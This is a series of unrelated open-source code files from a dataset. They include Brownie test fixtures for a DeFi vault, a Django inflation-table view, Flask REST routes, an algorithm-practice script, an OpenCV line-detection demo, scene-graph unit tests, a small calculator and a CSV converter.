rando():\n yield accounts[9]\n\n\n###########################################\n\n################# Deploy #################\n@pytest.fixture\ndef deployed_vault(deployer, governance, keeper, guardian, strategist, token):\n vault = Vault.deploy({\"from\": deployer})\n vault.initialize(\n token,\n governance,\n keeper,\n guardian,\n governance,\n strategist,\n False,\n \"\",\n \"\",\n [\n performanceFeeGovernance,\n performanceFeeStrategist,\n withdrawalFee,\n managementFee,\n ],\n )\n return vault\n\n\n@pytest.fixture\ndef deploy_complete(\n deployer, governance, keeper, guardian, badger, rando, proxyAdmin, strategist\n):\n\n token = MockToken.deploy({\"from\": deployer})\n token.initialize(\n [deployer.address, rando.address], [100 * 10 ** 18, 100 * 10 ** 18]\n )\n want = token\n\n # NOTE: change strategist\n vault = Vault.deploy({\"from\": deployer})\n vault.initialize(\n token,\n governance,\n keeper,\n guardian,\n governance,\n strategist,\n False,\n \"\",\n \"\",\n [\n performanceFeeGovernance,\n performanceFeeStrategist,\n withdrawalFee,\n managementFee,\n ],\n )\n vault.setStrategist(strategist, {\"from\": governance})\n # NOTE: Vault starts unpaused\n\n strategy = DemoStrategy.deploy({\"from\": deployer})\n strategy.initialize(vault, [token])\n # NOTE: Strategy starts unpaused\n\n vault.setStrategy(strategy, {\"from\": governance})\n\n return DotMap(\n vault=vault,\n strategy=strategy,\n want=want,\n performanceFeeGovernance=performanceFeeGovernance,\n performanceFeeStrategist=performanceFeeStrategist,\n withdrawalFee=withdrawalFee,\n )\n\n\n@pytest.fixture\ndef deployed_gueslist(\n deployed_vault,\n deployer,\n governance,\n proxyAdmin,\n keeper,\n guardian,\n strategist,\n token,\n):\n \"\"\"\n Deploys TestVipCappedGuestListBbtcUpgradeable.sol for testing Guest List functionality\n \"\"\"\n\n # NOTE: Change accordingly\n vaultAddr = deployed_vault.address\n merkleRoot = 
\"0x1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a\"\n userCap = 2e18\n totalCap = 50e18\n\n # Get deployer account from local keystore. Deployer must be the\n # vault's governance address in order to set its guestlist parameters.\n dev = deployer\n\n # Get actors\n governance = governance\n proxyAdmin = proxyAdmin\n\n assert governance != AddressZero\n assert proxyAdmin != AddressZero\n\n # Deploy guestlist\n guestlist = deploy_guestlist(dev, proxyAdmin, vaultAddr)\n\n # Set guestlist parameters\n guestlist.setUserDepositCap(userCap, {\"from\": dev})\n assert guestlist.userDepositCap() == userCap\n\n guestlist.setTotalDepositCap(totalCap, {\"from\": dev})\n assert guestlist.totalDepositCap() == totalCap\n\n # Transfers ownership of guestlist to Badger Governance\n guestlist.transferOwnership(governance, {\"from\": dev})\n assert guestlist.owner() == governance\n\n vault = deployed_vault\n\n vault.setStrategist(deployer, {\"from\": governance})\n # NOTE: Vault starts unpaused\n\n performanceFeeGovernance = 1000\n performanceFeeStrategist = 1000\n withdrawalFee = 50\n\n strategy = DemoStrategy.deploy({\"from\": deployer})\n strategy.initialize(vault, [token])\n # NOTE: Strategy starts unpaused\n\n vault.setStrategy(strategy, {\"from\": governance})\n\n return DotMap(vault=vault, guestlist=guestlist, strategy=strategy)\n\n\ndef deploy_guestlist(dev, proxyAdmin, vaultAddr):\n\n guestlist_logic = TestVipCappedGuestListBbtcUpgradeable.deploy({\"from\": dev})\n\n # Initializing arguments\n args = [vaultAddr]\n\n guestlist_proxy = AdminUpgradeabilityProxy.deploy(\n guestlist_logic,\n proxyAdmin,\n guestlist_logic.initialize.encode_input(*args),\n {\"from\": dev},\n )\n time.sleep(1)\n\n ## We delete from deploy and then fetch again so we can interact\n AdminUpgradeabilityProxy.remove(guestlist_proxy)\n guestlist_proxy = TestVipCappedGuestListBbtcUpgradeable.at(guestlist_proxy.address)\n\n # console.print(\"[green] Using Guestlist in conftest.py/functional\")\n console.print(\"[green]Guestlist was deployed at: [/green]\", guestlist_proxy.address)\n\n return guestlist_proxy\n\n\n#############################################\n","repo_name":"GalloDaSballo/badger-sett-1.5","sub_path":"tests/functional/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":5583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35865660020","text":"import csv\nfrom django.shortcuts import render\nfrom django.views.generic import TemplateView\nfrom app.settings import INFLATION_CSV\n\n\nclass InflationView(TemplateView):\n template_name = 'inflation.html'\n\n def get(self, request, *args, **kwargs):\n # чтение csv-файла и заполнение контекста\n inflation_color = []\n headers = []\n with open(INFLATION_CSV, newline='', encoding='utf-8') as csvfile:\n reader = csv.DictReader(csvfile, delimiter=';')\n flag = True\n for row in reader:\n year = []\n keys = row.keys()\n\n for key in keys:\n month = {}\n if row[key]:\n if key == 'Г��д':\n month['count'] = int(row[key])\n else:\n month['count'] = float(row[key])\n\n if month['count'] < 0:\n month['color'] = 'green'\n\n elif 1 <= month['count'] < 2:\n month['color'] = 'orangered'\n\n elif 2 <= month['count'] < 5:\n month['color'] = 'red'\n elif month['count'] >= 5:\n month['color'] = 'darkred'\n else:\n month['color'] = 'white'\n\n if key == 'Год':\n month['color'] = 'white'\n\n elif key == 'Суммарная':\n month['color'] = 'lightgrey'\n\n else:\n month['count'] = '-'\n month['color'] 
= 'white'\n\n                        year.append(month)\n\n                        if flag:\n                            headers.append(key)\n\n                    flag = False\n                    inflation_color.append(year)\n\n        context = {'data': inflation_color, 'headers': headers}\n        return render(request, self.template_name,\n                      context)\n","repo_name":"shattl2000/Netology","sub_path":"Python_course/Part 3/dynamic-templates/task1/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"33080657378","text":"from flask import Blueprint, jsonify, request\nfrom flask_login import login_required, current_user\nfrom app.api.auth_routes import validation_errors_to_error_messages\nfrom app.forms import TransactionForm\nfrom app.models import db, Transaction\nfrom datetime import datetime, timezone\n\ntransaction_routes = Blueprint('transactions', __name__)\n\n\n@transaction_routes.route('/')\n@login_required\ndef get_all_transactions():\n    # Returns all transactions made by logged in user\n    party_id = current_user.id\n    transactions = Transaction.query.filter(Transaction.party_id == party_id).all()\n\n    return { 'transactions' : [transaction.to_dict() for transaction in transactions]}, 200\n\n\n@transaction_routes.route('/new', methods=['POST'])\n@login_required\ndef post_transactions():\n    party_id = current_user.id\n\n    form = TransactionForm()\n    form['csrf_token'].data = request.cookies['csrf_token']\n\n    if form.validate_on_submit():\n        # find out what it is doing\n        # if type is cryptocurrency\n        # find out if it is adding/removing\n        # other transaction is $$$$$\n\n        transaction_A = Transaction()\n        transaction_B = Transaction()\n\n        form.populate_obj(transaction_A)\n        form.populate_obj(transaction_B)\n\n        transaction_A.party_id = party_id\n        transaction_B.party_id = party_id\n\n\n        if transaction_A.asset_id != '$$$$$':\n            # transaction_A.total = -transaction_A.total\n\n            transaction_B.asset_id = '$$$$$'\n            transaction_B.symbol = '$$$$$'\n            transaction_B.name = '$$$$$'\n            transaction_B.type = 'exchange'\n            transaction_B.quantity = transaction_B.total\n\n            # if transaction_A.total > 0:\n            #     # meaning that cash was added\n            #     # meaning that an asset was sold\n            #     # meaning that quantity must be negative\n            #     transaction_A.quantity = -transaction_A.quantity\n\n            transaction_A.timestamp = datetime.now(timezone.utc)\n            transaction_B.timestamp = datetime.now(timezone.utc)\n            db.session.add(transaction_A)\n            # db.session.add(transaction_B)\n            db.session.commit()\n            return { 'message': 'Transactions successfully posted.'}\n\n        else:\n            # if asset_id is $$$$$\n            # then it was a deposit\n            # transaction_A.type will be Bank deposit\n            transaction_B.quantity = -transaction_A.quantity\n            transaction_B.total = -transaction_A.quantity\n            transaction_B.type = 'Bank Withdrawal'\n\n            transaction_A.timestamp = datetime.now(timezone.utc)\n            transaction_B.timestamp = datetime.now(timezone.utc)\n            db.session.add(transaction_A)\n            db.session.add(transaction_B)\n            db.session.commit()\n            return { 'message': 'Transactions successfully posted.'}\n    else:\n        return { 'errors': validation_errors_to_error_messages(form.errors) }, 400\n","repo_name":"hang-justin/robinhood-clone","sub_path":"app/api/transaction_routes.py","file_name":"transaction_routes.py","file_ext":"py","file_size_in_byte":2971,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
{"seq_id":"70255326132","text":"import sys\nfrom pprint import pprint\ninput = sys.stdin.readline\n\nh, w = map(int, input().split())\ngrid = 
[list(input().strip()) for _ in range(h)]\n\n# print('input----->')\n# pprint(grid)\n# print('<-----input')\n\nd_mark = ['^', '>', 'v', '<']\ndy = [-1, 0, 1, 0]\ndx = [0, 1, 0, -1]\n\ndef findStart(grid):\n    # print('findStart----->')\n    for j in range(h):\n        for i in range(w):\n            if grid[j][i] == '#':\n                direction = findDirection(j, i)\n                # print(f'direction: {direction}')\n                if direction != -1:\n                    # print(f'start (y, x): ({j}, {i})')\n                    print(j+1, i+1)\n                    # print(f'direction: {d_mark[direction]}')\n                    print(d_mark[direction])\n                    # print('<-----findStart')\n                    return j, i, direction\n\ndef findDirection(y, x):\n    # print('findDirection----->')\n    count = 0\n    for k in range(4):\n        ny = y + dy[k]\n        nx = x + dx[k]\n        if 0 <= ny < h and 0 <= nx < w:\n            if grid[ny][nx] == '#':\n                # print(f'ny, nx: ({ny}, {nx})')\n                direction = k\n                count += 1\n    # print(f'direction, count : {direction}, {count}')\n    # print('<-----findDirection')\n    return direction if count == 1 else -1\n\ndef navigate(y, x, direction):\n    grid[y][x] = '.'\n    prevDir = nextDir = direction\n    while True:\n        while prevDir == nextDir:\n            print('A', end='')\n            y = y + dy[prevDir]\n            x = x + dx[prevDir]\n            grid[y][x] = '.'\n            y = y + dy[prevDir]\n            x = x + dx[prevDir]\n            grid[y][x] = '.'\n\n            nextDir = findDirection(y, x)\n            # print(f'prevDir, nextDir : {prevDir}, {nextDir}')\n            if nextDir == -1:\n                return\n        if (nextDir - prevDir) % 4 == 1:\n            print('R', end='')\n        elif (nextDir - prevDir) % 4 == 3:\n            print('L', end='')\n        prevDir = nextDir\n\nsy, sx, direction = findStart(grid)\nnavigate(sy, sx, direction)","repo_name":"vfrnji124/algorithm_practice","sub_path":"HSAT/HSAT_01_로봇이_지나간_경로.py","file_name":"HSAT_01_로봇이_지나간_경로.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"74345548853","text":"import cv2 as cv\nimport numpy as np\n\n\ndef main(video):\n    low = {\"H\":32,\"S\":80,\"V\":62}\n    high = {\"H\":114,\"S\":255,'V':132}\n    src_window = \"Source\"\n    dst_window = \"Output\"\n    building(video,high,low,src_window,dst_window)\n\ndef building(video,high,low,src_window,dst_window):\n    cv.namedWindow(src_window)\n    cv.namedWindow(dst_window)\n    while True:\n        ret,frame = video.read()\n        if frame is None:\n            break\n        key = cv.waitKey(10)\n        if key == ord('p'):\n            cv.waitKey(-1)\n        frame_HSV = cv.cvtColor(frame,cv.COLOR_BGR2HSV)\n        frame_threshold = cv.inRange(frame_HSV,(low[\"H\"],low[\"S\"],low[\"V\"]),(high[\"H\"],high['S'],high[\"V\"]))\n        canimg = hough(frame_HSV)\n        ##cv.imshow(src_window, frame)\n        cv.imshow(dst_window, frame_threshold)\n        cv.imshow(\"NewFrame\",canimg)\n        if key == ord('q') or key == 27:\n            break\n    video.release()\n    cv.destroyAllWindows()\n\ndef hough(frame):\n    newimg = cv.cvtColor(frame,cv.COLOR_BGR2GRAY)\n    canimg = cv.Canny(newimg,50,200)\n    lines = cv.HoughLines(canimg,1,np.pi/180,120,np.array([]))\n    if lines is None:\n        return canimg  # no lines detected in this frame\n    for line in lines:\n        rho,theta = line[0]\n        a = np.cos(theta)\n        b = np.sin(theta)\n        x0 = a*rho\n        y0 = b*rho\n        x1 = int(x0+1000*(-b))\n        y1 = int(y0 + 1000*(a))\n        x2 = int(x0 -1000*(-b))\n        y2 = int(y0 - 1000 *(a))\n        cv.line(frame, (x1,y1), (x2,y2), (0,0,255), 2)\n    #cv.imshow(\"Lines\",frame)\n    #cv.imshow(\"Canny\",canimg)\n    #cv.waitKey(0)\n    return canimg\n\nif __name__ == \"__main__\":\n    video = cv.VideoCapture(r\"../footage/longgame.mp4\")\n    
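# sample path from the original repo; point VideoCapture at any local clip\n    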
main(video)","repo_name":"Bdkelly/BenKelly_MnM4SDS_project_draft","sub_path":"src/testhough.py","file_name":"testhough.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4241791370","text":"from UM.Mesh.MeshData import MeshData\nfrom UM.Scene.GroupDecorator import GroupDecorator\nfrom UM.Scene.SceneNode import SceneNode\n\nfrom UM.Math.Vector import Vector\nfrom UM.Math.Quaternion import Quaternion\nfrom UM.Math.Matrix import Matrix\nfrom UM.Math.Float import Float\n\nimport unittest\nimport math\n\nfrom copy import deepcopy\n\nclass SceneNodeTest(unittest.TestCase):\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n def test_setPosition(self):\n node = SceneNode()\n\n self.assertEqual(node.getPosition(), Vector(0, 0, 0))\n\n node.setPosition(Vector(0, 0, 10))\n\n self.assertEqual(node.getPosition(), Vector(0, 0, 10))\n\n node.setPosition(Vector(0, 0, 10))\n\n self.assertEqual(node.getPosition(), Vector(0, 0, 10))\n\n def test_translate(self):\n node = SceneNode()\n\n self.assertEqual(node.getPosition(), Vector(0, 0, 0))\n\n node.translate(Vector(0, 0, 10))\n\n self.assertEqual(node.getPosition(), Vector(0, 0, 10))\n\n node.translate(Vector(0, 0, 10))\n\n self.assertEqual(node.getPosition(), Vector(0, 0, 20))\n\n def test_setOrientation(self):\n node = SceneNode()\n\n self.assertEqual(node.getOrientation(), Quaternion())\n\n node.setOrientation(Quaternion.fromAngleAxis(math.pi / 4, Vector.Unit_Z))\n\n self.assertEqual(node.getOrientation(), Quaternion.fromAngleAxis(math.pi / 4, Vector.Unit_Z))\n\n node.setOrientation(Quaternion.fromAngleAxis(math.pi / 4, Vector.Unit_Z))\n\n self.assertEqual(node.getOrientation(), Quaternion.fromAngleAxis(math.pi / 4, Vector.Unit_Z))\n\n def test_rotate(self):\n node = SceneNode()\n\n self.assertEqual(node.getOrientation(), Quaternion())\n\n node.rotate(Quaternion.fromAngleAxis(math.pi / 4, Vector.Unit_Z))\n\n self.assertEqual(node.getOrientation(), Quaternion.fromAngleAxis(math.pi / 4, Vector.Unit_Z))\n\n node.rotate(Quaternion.fromAngleAxis(math.pi / 4, Vector.Unit_Z))\n\n self.assertEqual(node.getOrientation(), Quaternion.fromAngleAxis(math.pi / 2, Vector.Unit_Z))\n\n def test_setScale(self):\n node = SceneNode()\n\n self.assertEqual(node.getScale(), Vector(1, 1, 1))\n\n node.setScale(Vector(1.5, 1.5, 1.5))\n\n self.assertEqual(node.getScale(), Vector(1.5, 1.5, 1.5))\n\n node.setScale(Vector(1.5, 1.5, 1.5))\n\n self.assertEqual(node.getScale(), Vector(1.5, 1.5, 1.5))\n\n def test_scale(self):\n node = SceneNode()\n\n self.assertEqual(node.getScale(), Vector(1, 1, 1))\n\n node.scale(Vector(1.5, 1.5, 1.5))\n\n self.assertEqual(node.getScale(), Vector(1.5, 1.5, 1.5))\n\n node.scale(Vector(1.5, 1.5, 1.5))\n\n self.assertEqual(node.getScale(), Vector(2.25, 2.25, 2.25))\n\n def test_translateWorld(self):\n node1 = SceneNode()\n\n node2 = SceneNode(node1)\n\n self.assertEqual(node2.getWorldPosition(), Vector(0, 0, 0))\n\n node1.translate(Vector(0, 0, 10))\n\n self.assertEqual(node1.getWorldPosition(), Vector(0, 0, 10))\n self.assertEqual(node2.getWorldPosition(), Vector(0, 0, 10))\n\n node2.translate(Vector(0, 0, 10))\n\n self.assertEqual(node1.getWorldPosition(), Vector(0, 0, 10))\n self.assertEqual(node2.getWorldPosition(), Vector(0, 0, 20))\n\n node1.rotate(Quaternion.fromAngleAxis(math.pi / 2, Vector.Unit_Y))\n\n self.assertEqual(node1.getWorldPosition(), Vector(0, 0, 10))\n self.assertEqual(node2.getWorldPosition(), Vector(10, 0, 10))\n\n 
node2.translate(Vector(0, 0, 10))\n\n # Local translation on Z with a parent rotated 90 degrees results in movement on X axis\n pos = node2.getWorldPosition()\n #Using fuzzyCompare due to accumulation of floating point error\n self.assertTrue(Float.fuzzyCompare(pos.x, 20, 1e-5), \"{0} does not equal {1}\".format(pos, Vector(20, 0, 10)))\n self.assertTrue(Float.fuzzyCompare(pos.y, 0, 1e-5), \"{0} does not equal {1}\".format(pos, Vector(20, 0, 10)))\n self.assertTrue(Float.fuzzyCompare(pos.z, 10, 1e-5), \"{0} does not equal {1}\".format(pos, Vector(20, 0, 10)))\n\n node2.translate(Vector(0, 0, 10), SceneNode.TransformSpace.World)\n\n # World translation on Z with a parent rotated 90 degrees results in movement on Z axis\n pos = node2.getWorldPosition()\n self.assertTrue(Float.fuzzyCompare(pos.x, 20, 1e-5), \"{0} does not equal {1}\".format(pos, Vector(20, 0, 20)))\n self.assertTrue(Float.fuzzyCompare(pos.y, 0, 1e-5), \"{0} does not equal {1}\".format(pos, Vector(20, 0, 20)))\n self.assertTrue(Float.fuzzyCompare(pos.z, 20, 1e-5), \"{0} does not equal {1}\".format(pos, Vector(20, 0, 20)))\n\n node1.translate(Vector(0, 0, 10))\n\n self.assertEqual(node1.getWorldPosition(), Vector(10, 0, 10))\n\n pos = node2.getWorldPosition()\n self.assertTrue(Float.fuzzyCompare(pos.x, 30, 1e-5), \"{0} does not equal {1}\".format(pos, Vector(30, 0, 20)))\n self.assertTrue(Float.fuzzyCompare(pos.y, 0, 1e-5), \"{0} does not equal {1}\".format(pos, Vector(30, 0, 20)))\n self.assertTrue(Float.fuzzyCompare(pos.z, 20, 1e-5), \"{0} does not equal {1}\".format(pos, Vector(30, 0, 20)))\n\n node1.scale(Vector(2, 2, 2))\n\n pos = node2.getWorldPosition()\n self.assertTrue(Float.fuzzyCompare(pos.x, 50, 1e-4), \"{0} does not equal {1}\".format(pos, Vector(50, 0, 30)))\n self.assertTrue(Float.fuzzyCompare(pos.y, 0, 1e-4), \"{0} does not equal {1}\".format(pos, Vector(50, 0, 30)))\n self.assertTrue(Float.fuzzyCompare(pos.z, 30, 1e-4), \"{0} does not equal {1}\".format(pos, Vector(50, 0, 30)))\n\n node2.translate(Vector(0, 0, 10))\n\n pos = node2.getWorldPosition()\n self.assertTrue(Float.fuzzyCompare(pos.x, 70, 1e-4), \"{0} does not equal {1}\".format(pos, Vector(70, 0, 30)))\n self.assertTrue(Float.fuzzyCompare(pos.y, 0, 1e-4), \"{0} does not equal {1}\".format(pos, Vector(70, 0, 30)))\n self.assertTrue(Float.fuzzyCompare(pos.z, 30, 1e-4), \"{0} does not equal {1}\".format(pos, Vector(70, 0, 30)))\n\n # World space set position\n node1 = SceneNode()\n node2 = SceneNode(node1)\n node1.setPosition(Vector(15,15,15))\n node2.setPosition(Vector(10,10,10))\n self.assertEqual(node2.getWorldPosition(), Vector(25, 25, 25))\n #node2.setPosition(Vector(15,15,15), SceneNode.TransformSpace.World)\n #self.assertEqual(node2.getWorldPosition(), Vector(15, 15, 15))\n #self.assertEqual(node2.getPosition(), Vector(0,0,0))\n\n node1.setPosition(Vector(15,15,15))\n node2.setPosition(Vector(0,0,0))\n node2.rotate(Quaternion.fromAngleAxis(-math.pi / 2, Vector.Unit_Y))\n node2.translate(Vector(10,0,0))\n self.assertEqual(node2.getWorldPosition(), Vector(15,15,25))\n\n node2.setPosition(Vector(15,15,25), SceneNode.TransformSpace.World)\n self.assertEqual(node2.getWorldPosition(), Vector(15,15,25))\n self.assertEqual(node2.getPosition(), Vector(0,0,10))\n\n def test_setName(self):\n node = SceneNode()\n node.setName(\"DERP\")\n assert node.getName() == \"DERP\"\n\n def test_getDepth(self):\n node1 = SceneNode()\n node2 = SceneNode()\n node3 = SceneNode()\n node4 = SceneNode()\n\n node1.addChild(node2)\n node1.addChild(node3)\n 
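# hang node4 off node2 so the tree gains a third level\n        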
node2.addChild(node4)\n\n assert node1.getDepth() == 0\n assert node2.getDepth() == 1\n assert node3.getDepth() == 1\n assert node4.getDepth() == 2\n\n def test_visibility(self):\n node1 = SceneNode()\n node1.setVisible(True)\n assert node1.isVisible()\n\n node2 = SceneNode()\n node1.addChild(node2)\n node2.setVisible(True)\n assert node2.isVisible()\n\n node1.setVisible(False)\n assert not node1.isVisible()\n assert not node2.isVisible()\n\n def test_enabled(self):\n node1 = SceneNode()\n node1.setEnabled(True)\n assert node1.isEnabled()\n\n node2 = SceneNode()\n node1.addChild(node2)\n node2.setEnabled(True)\n assert node2.isEnabled()\n\n node1.setEnabled(False)\n assert not node1.isEnabled()\n assert not node2.isEnabled()\n\n def test_removeChildren(self):\n node1 = SceneNode()\n node2 = SceneNode()\n node1.addChild(node2)\n assert node1.hasChildren()\n\n node1.removeAllChildren()\n\n assert not node1.hasChildren()\n\n def test_getAllChildren(self):\n parent_node = SceneNode()\n child_node_1 = SceneNode()\n child_node_2 = SceneNode()\n parent_node.addChild(child_node_1)\n parent_node.addChild(child_node_2)\n\n child_1_of_child_node_1 = SceneNode()\n child_2_of_child_node_1 = SceneNode()\n child_node_1.addChild(child_1_of_child_node_1)\n child_node_1.addChild(child_2_of_child_node_1)\n\n child_1_of_child_node_2 = SceneNode()\n child_node_2.addChild(child_1_of_child_node_2)\n\n assert parent_node.getAllChildren() == [child_node_1, child_node_2, child_1_of_child_node_1, child_2_of_child_node_1, child_1_of_child_node_2]\n\n def test_rotateWorld(self):\n pass\n\n def test_scaleWorld(self):\n node1 = SceneNode()\n node2 = SceneNode(node1)\n\n node2.scale(Vector(1.5,1.,1.))\n node2.translate(Vector(10,10,10))\n self.assertEqual(node2.getWorldPosition(), Vector(15,10,10))\n node2.scale(Vector(1.5,1,1))\n self.assertEqual(node2.getWorldPosition(), Vector(15,10,10))\n\n def test_deepCopy(self):\n node_1 = SceneNode()\n node_2 = SceneNode()\n node_1.translate(Vector(1, 2, 3))\n node_1.scale(Vector(1.5, 1., 1.))\n node_1.setMeshData(MeshData())\n node_1.addChild(node_2)\n node_1.addDecorator(GroupDecorator())\n copied_node = deepcopy(node_1)\n\n assert copied_node.getScale() == Vector(1.5, 1, 1)\n assert copied_node.getPosition() == Vector(1, 2, 3)\n assert len(copied_node.getChildren()) == 1\n # Ensure that the decorator also got copied\n assert copied_node.callDecoration(\"isGroup\")\n\n def test_addRemoveDouble(self):\n # Adding a child that's already a child of a node should not cause issues. 
Same for trying to remove one that isn't a child\n\n        node_1 = SceneNode()\n        node_2 = SceneNode()\n        # Should work\n        node_1.addChild(node_2)\n        # Should still work!\n        node_1.addChild(node_2)\n\n        # This has already been tested somewhere else, so no problems are expected\n        node_1.removeChild(node_2)\n        # Doing it again shouldn't break.\n        node_1.removeChild(node_2)\n\nif __name__ == \"__main__\":\n    unittest.main()\n","repo_name":"DapDeveloper/Uranium","sub_path":"tests/Scene/TestSceneNode.py","file_name":"TestSceneNode.py","file_ext":"py","file_size_in_byte":10711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"2586346539","text":"from time import sleep\r\nimport os\r\nresp=0\r\nn1= int(input('Digite o primeiro número: '))\r\nn2= int(input('Digite o segundo número: '))\r\nwhile resp != '5':\r\n    resp=str(input('''OPÇÕES:\r\n    [1]SOMAR\r\n    [2]MULTIPLICAR\r\n    [3]MAIOR\r\n    [4]DIGITAR NOVOS NÚMEROS\r\n    [5]SAIR DO PROGRAMA\r\n    Escolha uma das opções acima: '''))\r\n    if resp == '1': # menu option: sum\r\n        print('SOMANDO OS NÚMEROS... AGUARDE')\r\n        sleep(1)\r\n        print(f'A soma dos números é {n1+n2}.')\r\n    elif resp == '2': # menu option: multiply\r\n        print('MULTIPLICANDO OS NÚMEROS.. AGUARDE')\r\n        sleep(1)\r\n        print(f'O produto dos valores digitados é {n1*n2}.')\r\n    elif resp == '3': # menu option: larger number\r\n        print('CALCULANDO O MAIOR NÚMERO... AGUARDE')\r\n        sleep(1)\r\n        if n1 > n2:\r\n            print(f'O maior número é {n1}.')\r\n        elif n1 < n2:\r\n            print(f'O maior número é {n2}.')\r\n        elif n2==n1:\r\n            print('Os números são iguais.')\r\n    elif resp == '4': # menu option: enter new numbers\r\n        print('ESCOLHA NOVOS NÚMEROS')\r\n        n1=int(input('Primeiro valor: '))\r\n        n2=int(input('Segundo valor: '))\r\n    elif resp not in ('1', '2', '3', '4', '5'): # tuple membership avoids matching substrings such as '54'\r\n        print('OPÇÃO INVÁLIDA !')\r\n        sleep(2)\r\nprint('Você finalizou o programa')\r\n","repo_name":"marciof2/PYTHON-","sub_path":"desafio59.py","file_name":"desafio59.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"43802830509","text":"import re\nimport sys\nimport codecs\nimport csv\nimport json\n\nfieldnames = ['entry', 'defid', 'word', 'author', 'definition', 'example', 'thumbs_up', 'thumbs_down']\n\ndb_file = sys.argv[1]\ndb_processed_file = db_file + '.processed'\ncsv_file = sys.argv[2]\n\n# Make sure readline will work properly by removing unicode line breaks\nwith codecs.open(db_file, 'r', encoding='utf-8') as f:\n    with codecs.open(db_processed_file, 'w', encoding='utf8') as out:\n        for line in f:\n            if line[-1] != '\\n':\n                out.write(line[:-1].strip())\n            else:\n                out.write(line.strip() + '\\n')\n\n\nwith codecs.open(db_processed_file, 'r', encoding='utf-8') as f:\n    with codecs.open(csv_file, 'w', encoding='utf8') as csvfile:\n        writer = csv.DictWriter(csvfile, fieldnames=fieldnames, quoting=csv.QUOTE_ALL)\n        writer.writeheader()\n        for line in f:\n            data = json.loads(line)\n            if not 'entry' in data:\n                continue\n            entry = data['entry']\n            for d in data['definitions']:\n                writer.writerow({\n                    'entry': entry,\n                    'defid': d['defid'],\n                    'word': d['word'],\n                    'author': d['author'],\n                    'definition': d['definition'],\n                    'example': d['example'],\n                    'thumbs_up': d['thumbs_up'],\n                    'thumbs_down': d['thumbs_down'],\n                    
})\n","repo_name":"mattbierner/urban-dictionary-entry-collector","sub_path":"gen_csv.py","file_name":"gen_csv.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"21"} +{"seq_id":"86302214920","text":"from flask import Flask, request\nfrom flask_restful import abort, Api, Resource\nimport sys,os,time\nimport sqlobject,json\nimport md5 # inseguro pero es un ejemplo demostrativo. \n#from myapp.Contact import Contact\n\napp = Flask(__name__)\napi = Api(app)\n\n\ndef IsValid(token):\n\tquery = TokenObj.q.token==token\n\tif TokenObj.select(query).count() == 1:\n\t\treturn True\n\telse:\n\t\treturn False\n\n\ndef get_elements(data):\n\tret = dict()\n\ttry:\n\t\telements = data.split('&')\n\t\tfor tupla in elements:\n\t\t\tdatos = tupla.split('=')\n\t\t\tif datos[1]: \n\t\t\t\tret[datos[0]]=datos[1]\n\t\treturn ret\n\texcept Exception as e:\n\t\treturn ret\n\n\nclass UserObj(sqlobject.SQLObject):\n\tname = sqlobject.StringCol(length=40, unique=True)\n\tcontact = sqlobject.MultipleJoin('ContactObj', joinColumn='user')\n\nclass TokenObj(sqlobject.SQLObject):\n\ttoken = sqlobject.StringCol(length=256, unique=True)\n\nclass ContactObj(sqlobject.SQLObject):\n\tdata = sqlobject.StringCol(length=256, unique=True)\n\tdatatype = sqlobject.StringCol(length=60)\n\tuser = sqlobject.ForeignKey('UserObj')\n\n\nclass User(Resource):\n\n\tdef get(self,data):\n\t\ttry:\n\t\t\targs = get_elements(data)\n\t\t\tif IsValid(args['token']):\n\t\t\t\tif args['name'] is not None:\n\t\t\t\t\tquery = UserObj.q.name==args['name']\n\t\t\t\t\tuser = UserObj.select(query)[0]\n\t\t\t\t\tif UserObj.select(query).count() == 0:\n\t\t\t\t\t\treturn {'Error':'Not Found'}, 404\n\t\t\t\t\treturn {'id': user.id,'name' : user.name},\n\t\t\t\telse:\n\t\t\t\t\tlista = {}\n\t\t\t\t\tfor user in UserObj.select():\n\t\t\t\t\t\tlista[user.id] = user.name\n\t\t\t\t\treturn lista\n\t\t\telse:\n\t\t\t\treturn {'Error':'Invalid Token'}, 401\n\t\texcept Exception as e:\n\t\t\treturn {'Error':'Bad Request'}, 400\n\n\n\tdef put(self,data):\n\t\ttry:\n\t\t\targs = get_elements(data)\n\t\t\tif IsValid(args['token']):\n\t\t\t\tif args['name'] is not None and args['id'] is not None:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tuser = UserObj.get(args['id'])\n\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\treturn {'Error':'User Not Found'}, 404\n\t\t\t\t\tuser.set(name=args['name'])\n\t\t\t\t\tuser = UserObj.get(args['id'])\n\t\t\t\treturn {'id': user.name}, 201\n\t\t\telse:\n\t\t\t\treturn {'Error':'Invalid Token'}, 401\n\t\texcept Exception as e:\n\t\t\treturn {'Error':'Bad Request'}, 400\n\n\n\n\tdef delete(self,data):\n\t\ttry:\n\t\t\targs = get_elements(data)\n\t\t\tif IsValid(args['token']):\n\t\t\t\tif args['name'] is not None:\n\t\t\t\t\tquery = UserObj.q.name==args['name']\n\t\t\t\t\tuser = UserObj.select(query)\n\t\t\t\t\tUserObj.delete(user.id)\n\t\t\t\treturn {'message': 'Done'},\n\t\t\telse:\n\t\t\t\treturn {'Error':'Invalid Token'}, 401\n\t\texcept Exception as e:\n\t\t\treturn {'Error':'Bad Request'}, 400\n\n\n\n\tdef post(self,data):\n\t\ttry:\n\t\t\targs = get_elements(data)\n\t\t\tif IsValid(args['token']):\n\t\t\t\tif args['name'] is not 